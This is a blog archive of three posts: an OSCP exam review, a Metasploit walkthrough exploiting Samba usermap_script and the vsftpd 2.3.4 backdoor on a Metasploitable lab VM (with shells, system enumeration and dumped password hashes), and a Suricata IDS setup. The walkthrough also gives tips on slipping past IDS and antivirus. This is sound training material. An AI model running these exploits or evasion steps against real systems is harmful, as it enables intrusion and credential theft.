Tag Archives: Kali

OSCP – Trying harder than ever before

Where I come from, being a tryhard has a lot of negative connotations.

cd3
Typical tryhard

Over the summer, I had the pleasure of taking Offensive Security’s Pentesting with Kali (PWK) course. I tried, tried hard, tried even harder.

Are you ready?

The biggest question leading up to the start of my lab time was “am I ready for this?”. As a young professional who hasn’t even been out of college for a year, I had many doubts regarding my abilities as a penetration tester. I had done some CTFs, some Vulnhub VMs, but had never done a professional penetration test. As you would expect from a recent college graduate, a lot of my knowledge was purely theoretical. I knew how attacks worked, but had only performed a few basic attacks. When I first read about this course a few years ago in college, I thought “maybe I’ll be good enough to take the course in 5 years”. I signed up anyway, and I’m so glad I did!

Offensive Security’s only states the prerequisites as “a solid understanding of TCP/IP, networking and reasonable Linux skills”. Here are some of the topics you should be familiar with:

  • You should be good with Linux and Windows command lines. I only got an RDP session with a few machines in the lab. The rest of the machines are interactive via a command line. If you understand these Linux (https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ ) and Windows (http://www.fuzzysecurity.com/tutorials/16.html ) commands, command structures, and command output, you are good (hint: you’re going to be using those two tutorials a lot)
  • You should understand the uses, limitations, and differences between popular networking protocols. If know what ICMP does, the differences between TCP and UDP, the differences between the services on TCP port 139 and TCP port 445, you’re OK.
  • You should understand the basic structure of packets. If the Wireshark interface is completely foreign to you, you might want to brush up on that.
  • You should be able to write basic Bash scripts. If you can write a Bash script that accepts some command line arguments, run some other commands in a loop, use if statements, and parse output with cut/sed/awk/whatever, you’re good
  • You should be able to read over Python/Perl/Ruby/C code and have a basic understanding of what it’s trying to do. I’m not saying you need to be able to understand every line of C code, but you should be able to understand what the code is attempting to do. Not every exploit will work unmodified, and the only way to know what’s wrong is to read and understand the code.
  • You should be familiar with what a debugger is capable of. In the course, you will be using a debugger to observe how a program crashes, and manipulate that crash to achieve code execution via a simple buffer overflow. If you can follow these two tutorials, you’re golden (http://www.fuzzysecurity.com/tutorials/expDev/1.html http://www.fuzzysecurity.com/tutorials/expDev/2.html

Now obviously, you don’t need to be an expert in any of the above before you start the course. This is, after all, a training. It’s just helpful to have a solid foundation and not be playing catch-up while in the lab. See the syllabus for more detailed information on what is covered in the course https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf

If you’re unsure, I recommend either buying this book (https://www.nostarch.com/pentesting ) or going over this course (https://www.cybrary.it/course/advanced-penetration-testing/ ). A lot of the material here can be directly applied to the labs.

I think it would also be beneficial to go over Metasploit Unleased (https://www.offensive-security.com/metasploit-unleashed/) prior to your time in the lab.

Signing up

I signed up for 90 days of lab time. This cost $1150, and included all the course material, and an exam attempt. Lab time starts on Saturdays, so plan your schedule accordingly. I received an email with all the course materials and my VPN connection pack.

soitbegins

Course VM

Offensive Security provides a non-standard 32-bit Kali VM for the purpose of this course. They said a stock/custom Kali VM is not officially supported. From what I can tell, the only part of the course that absolutely requires the OffSec VM is the Linux buffer overflow section. After I completed the course material on buffer overflows, I moved to a standard 64-bit Kali VM and never had any issues. The reason I moved over was for compatibility issues with the VMware tools. A list of additional tools installed by OffSec on the course VM can be found on the forums, and it is trivial to compile 32-bit exploits on a 64-bit machine (-m32 for gcc)

Ultimately it’s up to you.

Remember to take a snapshot of your machine EVERY DAY. When something inevitably fails, you’ll be glad you did.

Course materials

The course PDF was 376 pages. There are 148 videos, each ranging anywhere from 1 minute to 10 minutes. Although I was familiar with most of the concepts in the lab, it still took almost 2 weeks of full-time commitment (i.e. I didn’t go to work) to finish all content in the PDF and videos.

I recommend going through the videos and PDF side by side. Each video corresponds with a section in the PDF, and the material covered is not always the same. There might be some instructions in the video that aren’t in the PDF, or vice versa.

Make sure you start documenting the course exercises from the beginning if you plan on submitting this. Completing the course materials will give you up to 5 extra points on your exam score, and you’re definitely going to want this boost.

Taking notes

I started taking notes with Keepnote, but eventually moved over to Evernote. I had a stack of notebooks for each network, one notebook per host. Inside of each notebook, I would have a page for raw scans, a page for personal notes and observations, a page for my report, a page for different exploits I had already tried, a page for commands I already tried, etc. The idea was to not do any work twice. Evernote will sync between computers, which was nice.

I also kept a folder on my Kali VM where I also kept scan results, scripts, successful exploits, etc. I kept this synced by committing to a private Git repository. If you’re only doing the course from a single computer, you should still do this because it’s nice to have a backup.

The lab

There are around 55 machines in the lab, split between 4 different networks. To start, you only have access to the public network, but there are 3 other networks that aren’t routable to begin with. You can start with pretty much any machine you want, but my advice would be to leave the big 3 bosses (PAIN, SUFFERANCE, and HUMBLE) for last. Personally, I started with the low hanging fruit: Windows XP/2000 boxes or Linux boxes with old kernels are usually pretty easy to crack.

I set a goal for at least a new low priv shell/root shell every day, it’s really hard to follow goals like this. Sometimes I didn’t get any new shells for a week. Some days I would get 3 or 4 root shells. As you move your way through the network and figure out the dependencies, the shells will start to roll in.

Although there are several public machines with routes to the IT/dev networks, not all of these are ideal for our pivots. OffSec made it easy on us and put some dual-homed machines in there with SSH and nmap already installed. If you find a dual-homed machine without an SSH server already installed, my advice would be to keep note that the machine is dual-homed, but look for a better pivot. I wasted a lot of time trying to set up the required software to pivot. If you’re unfamiliar with the concept of pivoting AND you’re not even sure if you installed the SSH server correctly, it’s not very cohesive for learning.

I also recommend you read OffSec’s write-up of ALPHA. It’s great to read other people’s methodology for scanning, exploiting, and enumeration. Definitely check it out on the forum section for ALPHA

Here are some general hints on how to best spend your lab time:

  • It’s no secret that some machines in the lab require some piece of information to crack (i.e. re-used passwords, passwords in a .txt file, or a client-sided attack). Unfortunately, nobody will ever tell you which machines those are. If you’re scanning a machine and doing some good enumeration, but still can’t find a way in, move on and circle back. If you’re doing good post-exploitation on machines you root, you’ll find the hints. They’re not hidden.
  • #offsec on freenode and the forums were a great support. If you’re totally lost on a machine or are not sure if you have the correct vector, you can usually gather enough information from censored forum posts to know if you’re going down the right track (although there are usually more ways than one into a machine).
  • Don’t pay much attention to !hints in IRC. They hardly ever make sense, even after you’ve rooted the box
  • Don’t bother going to OffSec admin support unless you have a lot of work to show them. Going to them saying “help” or “I’m out of ideas” will get you a response of “try harder” or “go back to the enumeration step”. They can tell you if you’re on the right path, if you’re missing something obvious, or if you’re going down a rabbit hole, but only if you have work to show for it.
  • Brute force attacks are not as prevalent as I thought they would be. For online password attacks, if you don’t know a username, don’t even bother. If you know a username, don’t spend more than 5 minutes on a brute force attack. This is intentionally designed this way. If this is a route OffSec wanted you to take, the password will be very easy to guess. Don’t forget about Hydra’s -e option 🙂
  • Cracking hashes: unlike in a real penetration test, I recommend you try using online services before cracking unsalted hashes yourself. Crackpot, Hashkiller, and Crackstation were the 3 online services I primarily used. If they failed, I had cudaHashcat installed on my host machine. I’m not sure how fast this will be if you’re only using your CPU inside a VM, but with an NVIDIA 960 you can get a pretty good hash rate, depending on the algorithm used. For dictionaries, I definitely recommend you find a good English dictionary. I was very disappointed in rockyou’s performance. I never cracked any of the root passwords for the Linux boxes, but I never really needed to.
  • If you find yourself running exploits at the rate of one every few minutes, you need to take a step back and look at your enumeration results. For any exploit that you run, you need to have at least one solid piece of evidence that the exploit will be successful. ALWAYS read over the exploit
  • I never had to download a different OS to compile/test exploits. If you’re thinking you need to do this, you need to back up a few steps
  • Recursively running Dirbuster is a huge waste of time

Exam attempt 1

I thought I would have to buy an extension for sure. But as the shells kept rolling in, I realized around day 70 that the end was near. At around day 85, I had a proof.txt for every machine in the lab (with the exception of the firewall and the proxy server).

I recommend booking your exam over a month in advance, because weekend slots are usually filled for months out. You can always reschedule later if something comes up. Also note that lab extensions include a free exam attempt, so if you are buying an extension, you might as well take the exam and get that first fail out of the way 🙂

A few notes about the exam: no, you can’t run any tools you want. Vulnerability scanner (Nessus, Nexpose, OpenVAS) are not allowed. SQLmap/SQLninja are not allowed. You are only allowed to use Metasploit auxiliary, exploit, and post modules on a SINGLE machine on the exam. You can use any Metasploit payload you want as many times as you want, and you can use all Meterpreter functions except getsystem.

“But what if I have a time-based blind SQL injection vulnerability on the exam? I can’t do that manually!” Don’t worry about it.

Although I know that most people do not pass on the first attempt, I felt pretty confident about this exam. I had 50+ lab machines under my belt, I could write a basic buffer overflow in a few hours, and I had written quite a few scripts to augment both remote and local enumeration.

I started at noon on Friday. I got my first shell within 20 minutes, but things really started going downhill from there. I didn’t manage my time well, I made some mistakes early on which cost me a lot of time, and I wasted my Metasploit lifeline. My advice here is: do it right and do it thoroughly the first time, or don’t even bother doing it. Also, save your lifeline for as long as you can. If you suspect a host is vulnerable to a Metasploit exploit module, save it for last.

In the exam, each box is given a point value for a total of 100 points. If you submit a lab report and include the answers to the course exercises, you are given 10 extra points. Low privileged shells are worth “some” points (I don’t imagine more than half).

My first attempt got me around 55 points, including my lab report. Although I felt prepared, I obviously had some more work to do. Definitely turn in your lab report and course materials and ask for feedback so you know you’re getting the maximum 10 extra points.

defeat

Exam attempt 2

When I initially scheduled my second attempt, there were no slots available for over a month. I checked back a few days later, and saw slots available for the next week. Check back with the schedule often if you are looking for earlier slots.

I made some improvements to my scripts, and practiced on some vulnerable VMs from Vulnhub. I also practiced writing more buffer overflows.

My next attempt was much smoother. I had 1 root and 2 low priv shells after only 2 hours. After 16 hours, I was confident I had enough points to pass, but probably spent a total of 21 hours in the exam, with an hour for dinner and a two hour nap. A lot of people say “take regular breaks”, “sleep”, “eat snacks”, etc. The only time I would go AFK was when I started to feel frustrated. When the frustration sets in, get up for a bit, and move on to a different machine when you come back. I wouldn’t recommend sleeping unless you think you have enough points to pass.

I finished the exam with 3 root shells and 1 low priv shell, for a total of 65 points (including the extra credit from the lab and course exercises). You need 70 points to pass. Since you don’t know how many points low privileged shells are, I wasn’t 100% sure I had enough points to pass. I was hoping a low privileged shell would be at least 5 points.

sweating

A few days later I got the best email of my life: “We are happy to inform you that you have successfully completed the Penetration Testing with Kali Linux certification exam and have obtained your Offensive Security Certified Professional (OSCP) certification”

victory

Aftermath

I spent an average of 5 hours in the lab on weekdays, 10 hours in the lab on weekends, for about 12 weeks. In total, I probably spent around 600 hours in the lab over my 90 days. I did this along side a 40 hour work week. Fortunately I had no relationship or familial issues distracting me during this time. Obviously the time required may vary depending on your past penetration testing experience and current living situations, but hopefully this will give you an idea of the time commitment required.

Overall, my experience in the labs was 12/10. I learned more and worked harder in the labs than in all 4 years of college combined. I recommend this course to anyone interested in doing penetration testing as their line of work. I think that having this certification shows employers that you know enough about IT and information security to apply your knowledge to unfamiliar scenarios. Thanks to all the Offensive Security staff for such a fun summer! I look forward to applying the skills and work ethic developed in the course on the job.

For those people who haven’t been doing pentesting for years: The lab and exam are no joke. Many nights, you’ll go to sleep feeling like a failure and think to yourself “penetration testing is too difficult; I must change career paths”. But just try, try hard, and try harder!

I plan on taking the OSCE and OSWP in 2017. Hit me up on the twitter (https://twitter.com/kafkaesqu3) if you have questions about the course.

Happy hacking, and don’t forget to try harder!

Exploiting machines using Metasploit

Metasploit is a powerful tool for exploiting vulnerabilities on remote hosts. Metasploit allows you to trivially run an exploit on a host to execute a payload. I will take a look at some basics of Metasploit and use it to exploit some vulnerabilities in a Metasploitable VM.

Starting up the Metasploit framework from Kali. You will see it under Applications -> Exploitation Tools

msf > version
Framework: 4.11.5-2015121501
Console  : 4.11.5-2015121501.15168

I can execute relevant Linux commands from within the msf console.

msf > ifconfig
[*] exec: ifconfig

eth0      Link encap:Ethernet  HWaddr 00:0c:29:fa:df:2f  
          inet addr:192.168.238.136  Bcast:192.168.238.255  Mask:255.255.255.0
...

I can also use other tools within the msf console.

msf > nmap -sn 192.168.238.0/24
[*] exec: nmap -sn 192.168.238.0/24

Starting Nmap 6.49BETA5 ( https://nmap.org ) at 2016-01-05 18:13 EST
Nmap scan report for 192.168.238.1
Host is up (0.00044s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.238.2
Host is up (0.000050s latency).
MAC Address: 00:50:56:E9:39:5C (VMware)
Nmap scan report for 192.168.238.131
Host is up (0.00049s latency).
MAC Address: 00:0C:29:54:6E:48 (VMware)
Nmap scan report for 192.168.238.254
Host is up (0.00011s latency).
MAC Address: 00:50:56:FF:4C:2F (VMware)
Nmap scan report for 192.168.238.136
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.79 seconds

msf > nmap -sV 192.168.238.131
[*] exec: nmap -sV 192.168.238.131


Starting Nmap 6.49BETA5 ( https://nmap.org ) at 2016-01-05 18:30 EST
Nmap scan report for 192.168.238.131
Host is up (0.00014s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain      ISC BIND 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login?
514/tcp  open  tcpwrapped
1099/tcp open  rmiregistry GNU Classpath grmiregistry
1524/tcp open  shell       Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open  vnc         VNC (protocol 3.3)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         Unreal ircd
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:0C:29:54:6E:48 (VMware)
Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.06 seconds

I will try to gain shell access by exploiting Samba. Metasploit has two ports for Samba open: port 139 and port 445. Port 445 runs Samba over SMB directory over TCP, while port 139 runs Samba over NetBIOS over TCP.

I can search for exploits in the database using the search command:

msf > search Samba

Matching Modules
================

   Name                                            Disclosure Date  Rank       Description
   ----                                            ---------------  ----       -----------
   auxiliary/admin/smb/samba_symlink_traversal                      normal     Samba Symlink Directory Traversal
   auxiliary/dos/samba/lsa_addprivs_heap                            normal     Samba lsa_io_privilege_set Heap Overflow
   auxiliary/dos/samba/lsa_transnames_heap                          normal     Samba lsa_io_trans_names Heap Overflow
...

The results show the name of the exploit, when the exploit was disclosed, a ranking of the exploit (based on stability of the exploit and range of targets), and a description of the exploit including OS and service versions.
Metasploit also offers a grep tool, which can provide more search flexibility at the cost of formatting:

msf > grep -i samba search
   auxiliary/admin/smb/samba_symlink_traversal                                               normal     Samba Symlink Directory Traversal
   auxiliary/dos/samba/lsa_addprivs_heap                                                     normal     Samba lsa_io_privilege_set Heap Overflow
   auxiliary/dos/samba/lsa_transnames_heap                                                   normal     Samba lsa_io_trans_names Heap Overflow
   auxiliary/dos/samba/read_nttrans_ea_list                                                  normal     Samba read_nttrans_ea_list Integer Overflow
   auxiliary/scanner/smb/smb_uninit_cred                                                     normal     Samba _netr_ServerPasswordSet Uninitialized Credential State
   exploit/freebsd/samba/trans2open                                         2003-04-07       great      Samba trans2open Overflow (*BSD x86)
   exploit/linux/samba/chain_reply                                          2010-06-16       good       Samba chain_reply Memory Corruption (Linux x86)

I’ll be limited to exploits against Linux, since my only target is Metasploitable. I’m going to just pick one at random and go from there.

msf > use exploit/linux/samba/lsa_transnames_heap
msf exploit(lsa_transnames_heap) > show options

Module options (exploit/linux/samba/lsa_transnames_heap):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  LSARPC           yes       The pipe name to use


Exploit target:

   Id  Name
   --  ----
   0   Linux vsyscall

RHOST is the target of the attack.

msf exploit(lsa_transnames_heap) > set RHOST 192.168.238.131
RHOST => 192.168.238.131

I will start with a simple exploit to get a shell on the target.

msf exploit(lsa_transnames_heap) > set payload linux/x86/shell/bind_tcp
payload => linux/x86/shell/bind_tcp
msf exploit(lsa_transnames_heap) > show options

Module options (exploit/linux/samba/lsa_transnames_heap):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.238.131  yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  LSARPC           yes       The pipe name to use


Payload options (linux/x86/shell/bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST  192.168.238.131  no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Linux vsyscall

It looks like Metasploit has all the information it needs.

msf exploit(lsa_transnames_heap) > exploit

[*] Started bind handler
[*] Creating nop sled....
[*] Trying to exploit Samba with address 0xffffe410...
[*] Connecting to the SMB service...
[-] Exploit aborted due to failure: no-target: This target is not a vulnerable Samba server (Samba 3.0.20-Debian)
[*] Exploit completed, but no session was created.

The exploit didn’t work. Trying the next exploit:

msf exploit(lsa_transnames_heap) > use exploit/linux/samba/setinfopolicy_heap
msf exploit(setinfopolicy_heap) > show options

Module options (exploit/linux/samba/setinfopolicy_heap):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   RHOST                        yes       The target address
   RPORT       445              yes       Set the SMB service port
   StartBrute                   no        Start Address For Brute Forcing
   StopBrute                    no        Stop Address For Brute Forcing


Exploit target:

   Id  Name
   --  ----
   0   2:3.5.11~dfsg-1ubuntu2 on Ubuntu Server 11.10

I need to reset the RHOST and payload when trying a new exploit.

Exploit target:

   Id  Name
   --  ----
   0   2:3.5.11~dfsg-1ubuntu2 on Ubuntu Server 11.10


msf exploit(setinfopolicy_heap) > set RHOST 192.168.238.131
RHOST => 192.168.238.131
msf exploit(setinfopolicy_heap) > set payload linux/x86/shell/bind_tcp
payload => linux/x86/shell/bind_tcp
msf exploit(setinfopolicy_heap) > exploit

[*] Started bind handler
[*] Trying to exploit Samba with address 0xb67f1000...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0xb67f2000...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0xb67f4000...
[-] Server is most likely patched...
^C[-] Exploit failed: Interrupt 
[*] Exploit completed, but no session was created.

This exploit didn’t work either. Trying another:

msf exploit(setinfopolicy_heap) > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  139              yes       The target port


Exploit target:

   Id  Name
   --  ----
   0   Automatic
msf exploit(usermap_script) > set RHOST 192.168.238.131
RHOST => 192.168.238.131
msf exploit(usermap_script) > exploit

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo ciZ6DcyeZcCJsNkV;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "ciZ6DcyeZcCJsNkV\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.238.136:4444 -> 192.168.238.131:33372) at 2016-01-05 19:49:21 -0500

Success! I have a shell on the target. We can press CTRL+Z to save the shell in the background.

^Z
Background session 1? [y/N]  y
msf exploit(usermap_script) >

The usermap script attack exploits a command execution vulnerability in Samba through a username field. Since the username is entered before authentication, this exploit requires no authentication!

At this point, we can do one of two things: payloads or post-exploit scripts:

Metasploit offers over 200 payloads, but not every payload is compatible with every exploit. Most payloads you see only open a reverse shell to Metasploit, but a few unique payloads can add and edit files and users, change file permissions, perform DLL injections, or load Meterpreter. Meterpreter is by far the coolest payload offered by Metasploit. Metasploit resides solely in memory (to leave no trace on the disk), injects code into DLLs (so as to not spawn any processes), and all communication to Meterpreter is encrypted.
Once you get Meterpreter running on a machine, it is totally pwnd. Meterpreter gives you a whole environment on the infected machine to allow you to run commands, capture screenshots of the desktop, view the webcam, move the mouse, and capture keyboard input. Since Meterpreter runs only in memory, it will be gone once the machine restarts. It would be best to backdoor the machine.

Post-exploitation script allow us to gather information, pivot to other machines, sniff the network, set up a backdoor, etc.

msf exploit(usermap_script) > search post/linux/gather

Matching Modules
================

   Name                                     Disclosure Date  Rank    Description
   ----                                     ---------------  ----    -----------
   post/linux/gather/checkvm                                 normal  Linux Gather Virtual Environment Detection
   post/linux/gather/ecryptfs_creds                          normal  Gather eCryptfs Metadata
   post/linux/gather/enum_configs                            normal  Linux Gather Configurations
   post/linux/gather/enum_network                            normal  Linux Gather Network Information
   post/linux/gather/enum_protections                        normal  Linux Gather Protection Enumeration
   post/linux/gather/enum_psk                                normal  Linux Gather 802-11-Wireless-Security Credentials
   post/linux/gather/enum_system                             normal  Linux Gather System and User Information
...

I will use a script to gather information from the machine.

msf exploit(usermap_script) > use post/linux/gather/enum_system

I have a session saved from earlier, which I see using the following command.

msf post(enum_system) > sessions -l

Active sessions
===============

  Id  Type        Information  Connection
  --  ----        -----------  ----------
  1   shell unix               192.168.238.136:4444 -> 192.168.238.131:33372 (192.168.238.131)
sf post(enum_system) > show options

Module options (post/linux/gather/enum_system):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

msf post(enum_system) > set SESSION 1
SESSION => 1
msf post(enum_system) > exploit

[+] Info:
Login with msfadmin/msfadmin to get starteded network!                     ____  
[+]     Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
[+]     Module running as "root" user
[*] Linux version stored in /root/.msf5/loot/20160105212135_default_192.168.238.131_linux.enum.syste_273307.txt
[*] User accounts stored in /root/.msf5/loot/20160105212135_default_192.168.238.131_linux.enum.syste_703384.txt
[*] Installed Packages stored in /root/.msf5/loot/20160105212135_default_192.168.238.131_linux.enum.syste_304431.txt
[*] Running Services stored in /root/.msf5/loot/20160105212135_default_192.168.238.131_linux.enum.syste_305863.txt
[*] Cron jobs stored in /root/.msf5/loot/20160105212135_default_192.168.238.131_linux.enum.syste_807045.txt
[*] Disk info stored in /root/.msf5/loot/20160105212135_default_192.168.238.131_linux.enum.syste_687962.txt
[*] Logfiles stored in /root/.msf5/loot/20160105212135_default_192.168.238.131_linux.enum.syste_837062.txt
[*] Setuid/setgid files stored in /root/.msf5/loot/20160105212135_default_192.168.238.131_linux.enum.syste_887699.txt
[*] Post module execution completed

There’s a lot of intel in these files. I want to try and gather some password hashes.

msf post(enum_system) > use post/linux/gather/hashdump
msf post(hashdump) > show options

Module options (post/linux/gather/hashdump):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

msf post(hashdump) > set session 1
session => 1
msf post(hashdump) > exploit

[+] root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:0:0:root:/root:/bin/bash
[+] sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:3:3:sys:/dev:/bin/sh
[+] klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:103:104::/home/klog:/bin/false
[+] msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
[+] postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
[+] user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:1001:1001:just a user,111,,:/home/user:/bin/bash
[+] service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:1002:1002:,,,:/home/service:/bin/bash
[+] Unshadowed Password File: /root/.msf5/loot/20160105212317_default_192.168.238.131_linux.hashes_446028.txt
[*] Post module execution completed

For fun, I’ll exploit another service. Metasploitable is running vsftpd, so I’ll search for exploits.

msf post(hashdump) > search vsftp

Matching Modules
================

   Name                                  Disclosure Date  Rank       Description
   ----                                  ---------------  ----       -----------
   exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  VSFTPD v2.3.4 Backdoor Command Execution


msf post(hashdump) > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  21               yes       The target port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(vsftpd_234_backdoor) > set RHOST 192.168.238.131
RHOST => 192.168.238.131
msf exploit(vsftpd_234_backdoor) > exploit

[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned, handling...
[+] UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 2 opened (192.168.238.136:40469 -> 192.168.238.131:6200) at 2016-01-05 21:44:56 -0500

^Z
Background session 2? [y/N]  y

This gives a second session.

msf exploit(vsftpd_234_backdoor) > show sessions

Active sessions
===============

  Id  Type        Information  Connection
  --  ----        -----------  ----------
  1   shell unix               192.168.238.136:4444 -> 192.168.238.131:55821 (192.168.238.131)
  2   shell unix               192.168.238.136:40469 -> 192.168.238.131:6200 (192.168.238.131)

While Metasploit is an amazingly simple tool to use, one should be mindful of what’s going on under the hood to avoid the “script kiddie” moniker. Metasploit. Some things to keep in mind:

  • A decently tuned IDS will probably see you exploiting the service over the wire. Metasploit offers alternate methods of transporting over the wire, as well as different encoding schemes and fragmentation (note: encoding is NOT a good way of avoiding AV). Using an encrypted channel will also render the attack invisible.
  • Depending on the exploit or the payload, antivirus may catch on and mark your payload as malicious. DLL injection is an obvious way of avoiding AV because AV only scans the disk, but some exploits require disk writes. When injecting a payload into another process, Metasploit uses a default executable template which is easily detected by AV, regardless of the presence of a payload. If the target has any sort of AV, it is a good idea to change the executable template.

I’m sure I’ll be doing some more advanced attacks with Metasploit later to show off some more features.

Vulnerability analysis part 1: Setup

I set up a Kali VM and a Metasploitable VM.

I will set up an IDS in the Kali machine to monitor traffic across the network. I will then perform different stages of an attack and monitor which attacks alert the IDS. We will look at both stealthy attacks and loud smash-and-grab attacks.

Since Snort doesn’t exist in the Kali 2.0 repos, I will use Suricata.

# apt-get install suricata

Make some changes to the Suricata configuration file like so.

# gedit /etc/default/suricata

Untitled

We will use Oinkmaster to fetch the Snort rules.

# gedit /etc/oinkmaster.conf

Add this URL:

url = http://rules.emergingthreats.net/open/suricata/emerging.rules.tar.gz

Now let’s run Oinkmaster to fetch the Emerging Threats rules.

# oinkmaster -C /etc/oinkmaster.conf -o /etc/suricata/rules

We can see the Snort rules here:

# ls /etc/suricata/rules
botcc.portgrouped.rules         emerging-icmp_info.rules       emerging-user_agents.rules
botcc.rules                     emerging-icmp.rules            emerging-voip.rules
BSD-License.txt                 emerging-imap.rules            emerging-web_client.rules
ciarmy.rules                    emerging-inappropriate.rules   emerging-web_server.rules
classification.config           emerging-info.rules            emerging-web_specific_apps.rules
compromised-ips.txt             emerging-malware.rules         emerging-worm.rules
compromised.rules               emerging-misc.rules            files.rules
decoder-events.rules            emerging-mobile_malware.rules  gen-msg.map
dns-events.rules                emerging-netbios.rules         gpl-2.0.txt
drop.rules                      emerging-p2p.rules             http-events.rules
dshield.rules                   emerging-policy.rules          rbn-malvertisers.rules
emerging-activex.rules          emerging-pop3.rules            rbn.rules
emerging-attack_response.rules  emerging-rpc.rules             reference.config
emerging-chat.rules             emerging-scada.rules           sid-msg.map
emerging.conf                   emerging-scan.rules            smtp-events.rules
emerging-current_events.rules   emerging-shellcode.rules       stream-events.rules
emerging-deleted.rules          emerging-smtp.rules            suricata-open.txt
emerging-dns.rules              emerging-snmp.rules            tls-events.rules
emerging-dos.rules              emerging-sql.rules             tor.rules
emerging-exploit.rules          emerging-telnet.rules          unicode.map
emerging-ftp.rules              emerging-tftp.rules
emerging-games.rules            emerging-trojan.rules

Start Suricata to sniff on the eth0 network interface.

# suricata -c /etc/suricata/suricata-debian.yaml -i eth0

Monitor the log file

# tail -f /var/log/suricata/fast.log

Now we have the IDS configured with the Emerging Threats ruleset.

Next up we will look at network reconnaissance.